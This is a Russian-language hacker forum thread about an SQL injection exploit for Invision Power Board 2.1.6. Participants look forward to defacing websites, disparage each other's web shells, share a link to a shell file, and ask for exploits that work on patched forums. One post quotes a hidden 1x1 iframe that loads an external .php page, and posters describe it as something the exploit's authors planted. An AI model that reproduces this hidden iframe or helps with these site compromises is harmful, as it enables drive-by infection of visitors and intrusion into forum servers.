Форумы Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC

Как говорится ждем дефейсофф

 

во.крутая вещь.уже протестировал.вообще супер.

 

Code:

<div style="VISIBILITY: hidden"><iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe></div>

нах такое надо?

 

zeppe1in
+1

RST всегда отличались тем что любили счетчики на шеллы влепить или же ифреймик что собственно и наблюдаем=))

 

шелл от рст дерьмо

 

Тогда где шел от ZaCo???

 

http://zaco.cup.su/uploads/SmWsHbZ.txt вообще он тоже дерьмовый но суть не в этом

 

а вчом

 

А как этот шел запускается .Что то он у меня не запускается

 

Интересную фишку я наблюдал при тестировании этого сплойта на forum.lineageii.ru. После первой проверки на уязвимость сразу же автоматически банят по ip.

 

lineageii.ru. достаточно серёзный проект и я недумаю что там настолько глупые админы чтоб не патчить свой форум!

 

Поддерживая ZaCo, скажу что шелл RST действительно дерьмо, да и ребята там не очень хорошо поступают, воруя чужие идеи.

 

А что с ним такого?-работает!!
И ты явно написал по теме..

 

Он не работал дня 2..просто узнать хотелось..может кто че знает

 

нет так нет=)

 

Люди добрые, есть у кого нибудь реальный Exploit чтоб работал 100% на IPB 2.1.6?
Тот что здесь давали не работает там где мне надо

 

Cплойт не может работать на 100% !!
Если форум патченный и нет не одного сплойта который будет канать!

 

- - -

 

Ну почему-же - сама ? Админы помогли...

 

А есть у кого експлоит который бы работал на magic_quote=on?
нa IPB 2.1.6